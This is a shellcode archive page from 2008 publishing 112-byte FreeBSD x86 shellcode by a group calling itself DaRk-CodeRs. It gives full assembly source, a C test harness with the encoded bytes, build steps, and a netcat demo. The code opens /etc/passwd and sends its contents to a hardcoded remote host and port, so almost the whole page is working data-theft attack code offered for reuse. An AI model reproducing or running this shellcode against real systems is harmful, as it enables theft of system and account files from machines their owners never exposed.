[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : freebsd/x86 connect back.send.exit /etc/passwd 112 bytes
# Published : 2008-09-10
# Author : suN8Hclf
# Previous Title : linux/x86 iopl(3); asm(cli); while(1){} 12 bytes
# Next Title : linux/x86 shellcode that forks a HTTP Server on port tcp/8800 166 bytes
***(C)oDed bY suN8Hclf***
DaRk-CodeRs Group production, kid
[FreeBSD x86 connect back.send.exit /etc/passwd 112 bytes]
This is the FreeBSD version of 0in's shellcode (http://milw0rm.com/shellcode/6263)
(really learnt a lot while coding this one ;])
Compile:
nasm -f elf shellcode.asm
ld -e _start -o shellcode shellcode.o
================================================================================
How it works:
1st terminal: $nc -l 8000
2nd terminal: $./shellcode
2nd terminal:
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
[..]
================================================================================
Code:
-------------------------code.asm---------------------
section .text
global _start
_start:
xor eax, eax
push byte 0x64
push word 0x7773
push 0x7361702f
push 0x6374652f ;file to open (default:/etc/passwd)
mov ebx, esp
push eax
push ebx
mov al, 5 ;use: 'cat /usr/src/sys/kern/syscalls.master | grep *' to get the right numbers
push eax
int 0x80 ;open()
mov ebx, eax ;file descriptor to ebx
xor eax, eax ;we should clean eax each time we return from int 0x80
xor ecx, ecx
mov cx, 3333 ;3333 bytes is probably enough
push ecx
mov esi, esp ;put our data on the stack
push esi
push ebx
mov al, 3
push eax
int 0x80 ;read()
mov ebp, eax
xor eax, eax
mov al, 6
push ebx
push eax
int 0x80 ;close()
xor eax, eax
push eax
push byte 0x01
push byte 0x02
mov al, 97
push eax
int 0x80 ;socket()
mov edx, eax ;socket descriptor to edx
push 0x2101a8c0 ;192.168.1.33, change IT!!!
push 0x401f02AA ;port 8000
mov eax, esp
push byte 0x10
push eax
push edx
xor eax, eax
mov al, 98
push eax
int 0x80 ;connect()
xor eax, eax
push ebp
push esi ;our buffer with data
push edx
mov al, 4
push eax
int 0x80 ;write()
xor eax, eax
inc eax
push eax
push eax
int 0x80 ;exit()
-------------------------code.asm---------------------
C Code:
-------------------------code.c-----------------------
#include <stdio.h>
char shellcode[]=
"x31xc0x6ax64x66x68x73x77x68x2fx70x61x73x68x2fx65x74x63"
"x89xe3x50x53xb0x05x50xcdx80x89xc3x31xc0x31xc9x66xb9x05"
"x0dx51x89xe6x56x53xb0x03x50xcdx80x89xc5x31xc0xb0x06x53"
"x50xcdx80x31xc0x50x6ax01x6ax02xb0x61x50xcdx80x89xc2"
"x68xc0xa8x01x21" //<- host address
"x68xaax02x1fx40" // <- port number
"x89xe0x6ax10x50x52x31xc0xb0x62x50xcdx80x31xc0x55x56x52"
"xb0x04x50xcdx80x31xc0x40x50x50xcdx80";
int main(int argc, char **argv) {
int (*func)();
func=(int (*)())shellcode;
(int)(*func)();
}
-------------------------code.c-----------------------
Greetz to: 0in, cOndemned, e.wiZz!, str0ke, doctor
Visit us : www.dark-coders.pl
# www.Syue.com [2008-09-10]